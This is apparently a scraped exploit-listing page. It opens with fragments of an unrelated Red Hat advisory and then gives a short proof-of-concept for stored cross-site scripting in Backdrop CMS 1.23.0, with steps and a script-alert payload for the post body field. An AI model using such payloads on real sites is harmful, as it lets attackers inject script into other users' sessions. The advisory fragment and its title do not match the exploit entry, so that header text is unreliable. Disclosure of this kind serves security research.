section.Solution:CVEs:CVE-2023-5678References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=webserver&downloadType=securityPatches&version=5.7https://bugzilla.redhat.com/show_bug.cgi?id=2248616https://bugzilla.redhat.com/show_bug.cgi?id=2252050https://bugzilla.redhat.com/show_bug.cgi?id=2269607

Red Hat Security Advisory 2024-1319-03

Backdrop CMS version 1.23.0 suffers from a persistent cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: Backdrop CMS 1.23.0 - Stored Cross-Site Scripting - Post Body Field# Date: 2023-08-21# Exploit Author: Sinem Şahin# Vendor Homepage: https://backdropcms.org/# Version: 1.23.0# Tested on: Windows & XAMPP==> Tutorial <==1- Go to the following url. => http://(HOST)/backdrop/node/add/post2- Write your xss payload in the body of the post. Formatting options should be RAW HTML to choose from.3- Press "Save" button.XSS Payload ==> "<script>alert("post_body")</script>

Tag

#windows